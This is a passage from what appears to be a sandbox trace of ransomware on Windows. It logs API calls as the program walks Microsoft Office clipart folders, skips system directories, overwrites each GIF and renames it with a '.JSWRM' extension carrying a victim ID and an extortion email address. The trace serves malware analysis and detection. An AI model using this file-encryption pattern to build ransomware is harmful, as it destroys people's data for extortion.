lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.563] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5253) returned 1 [0073.563] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1480) returned 0x24c1d0 [0073.563] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1480, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1480, lpOverlapped=0x0) returned 1 [0073.574] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.574] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1480, lpOverlapped=0x0) returned 1 [0073.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.574] CloseHandle (hObject=0x460) returned 1 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0073.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0073.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0073.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0073.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.576] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00135_.GIF", cAlternateFileName="")) returned 1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2=".") returned 1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="..") returned 1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="...") returned 1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="windows") returned -1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="recovery") returned -1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="perflogs") returned -1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="documents and settings") returned -1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="system volume information") returned -1 [0073.576] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="msocache") returned -1 [0073.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00135_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00135_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00135_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0073.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00135_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00135_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00135_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0073.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.587] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2596) returned 1 [0073.587] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa20) returned 0x23fc98 [0073.587] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xa20, lpOverlapped=0x0) returned 1 [0073.598] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.598] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xa20, lpOverlapped=0x0) returned 1 [0073.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0073.598] CloseHandle (hObject=0x460) returned 1 [0073.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0073.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0073.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0073.599] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.599] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.600] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x296f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00139_.GIF", cAlternateFileName="")) returned 1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2=".") returned 1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="..") returned 1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="...") returned 1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="windows") returned -1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="recovery") returned -1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="perflogs") returned -1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="documents and settings") returned -1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="system volume information") returned -1 [0073.600] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="msocache") returned -1 [0073.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00139_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00139_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00139_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00139_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00139_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00139_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0073.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.600] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10607) returned 1 [0073.601] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2960) returned 0x24c1d0 [0073.601] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2960, lpOverlapped=0x0) returned 1 [0073.603] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.603] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2960, lpOverlapped=0x0) returned 1 [0073.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.603] CloseHandle (hObject=0x460) returned 1 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0073.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0073.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0073.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0073.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.603] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00139_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00139_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0073.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.604] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00142_.GIF", cAlternateFileName="")) returned 1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2=".") returned 1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="..") returned 1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="...") returned 1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="windows") returned -1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="recovery") returned -1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="perflogs") returned -1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="documents and settings") returned -1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="system volume information") returned -1 [0073.604] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="msocache") returned -1 [0073.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00142_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00142_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00142_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0073.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00142_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00142_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00142_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0073.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.606] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15308) returned 1 [0073.606] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3bc0) returned 0x24c1d0 [0073.606] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3bc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3bc0, lpOverlapped=0x0) returned 1 [0073.608] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.608] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3bc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3bc0, lpOverlapped=0x0) returned 1 [0073.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.608] CloseHandle (hObject=0x460) returned 1 [0073.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.608] RtlAllocateHeap 